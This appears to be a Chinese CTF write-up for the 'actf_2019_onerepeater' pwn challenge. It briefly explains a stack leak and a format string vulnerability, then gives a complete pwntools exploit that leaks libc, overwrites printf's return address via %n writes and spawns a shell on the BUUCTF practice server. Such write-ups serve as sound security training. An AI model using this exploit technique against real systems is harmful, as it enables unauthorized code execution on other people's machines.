actf_2019_onerepeater
<p>[TOC]</p>
<h1>分析</h1>
<p>程序主要两个操作</p>
<p><img src="https://pic.imgdb.cn/item/63a6d5c808b683016366d194.png" alt="" /> </p>
<p>读取,但没有溢出,泄露了栈地址</p>
<p><img src="https://pic.imgdb.cn/item/63a6d60508b683016367252f.png" alt="" /> </p>
<p>格式化字符串漏洞,那么思路很清晰,先泄露libc地址计算one_gadget,然后写入函数返回的地址实现getshell,我这里采用system(”/bin/sh“)</p>
<h1>Exploit</h1>
<pre><code>from pwn import*
# context.log_level = 'debug'
# o = process("./pwn")
o =remote("node4.buuoj.cn", 25919)
o.sendlineafter("3) Exit\n", '1')
buf = int(o.recv(8), 16)
log.info("buf: %x\n", buf)
o.sendline("%2$p")
o.sendlineafter("3) Exit\n", '2')
puts_addr = int(o.recvline()[:-1], 16) - 11
log.info("puts_addr: %x\n", puts_addr)
libc_base = puts_addr - 0x67360
log.info("libc_base: %x\n", libc_base)
system = libc_base + 0x3cd10
bin_sh = libc_base + 0x17b8cf
printf_ret = buf - (0xffffcb40 - 0xffffcb1c)
printf_arg = printf_ret + 8
addr1 = int(hex(system)[-4:], 16)
addr2 = int(hex(system)[-8:-4], 16)
addr3 = int(hex(bin_sh)[-4:], 16)
addr4 = int(hex(bin_sh)[-8:-4], 16)
addr = [addr1, addr2, addr3, addr4]
addr.sort()
log.info("addr1: %x addr2: %x addr3: %x addr4: %x\n", addr1, addr2, addr3, addr4)
payload = p32(printf_ret) + p32(printf_ret+2) + p32(printf_arg) + p32(printf_arg+2)
dic = {addr1:"%16$n", addr2:"%17$n", addr3:"%18$n", addr4:"%19$n"}
payload += "%{}p".format(addr[0] - 16) + dic[addr[0]]
payload += "%{}p".format(addr[1] - addr[0]) + dic[addr[1]]
payload += "%{}p".format(addr[2] - addr[1]) + dic[addr[2]]
payload += "%{}p".format(addr[3] - addr[2]) + dic[addr[3]]
log.info("payload: %s\n", payload)
o.recv()
o.sendline('1')
o.recv()
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63a6ff1408b6830163ab1c3e.png" alt="" /></p>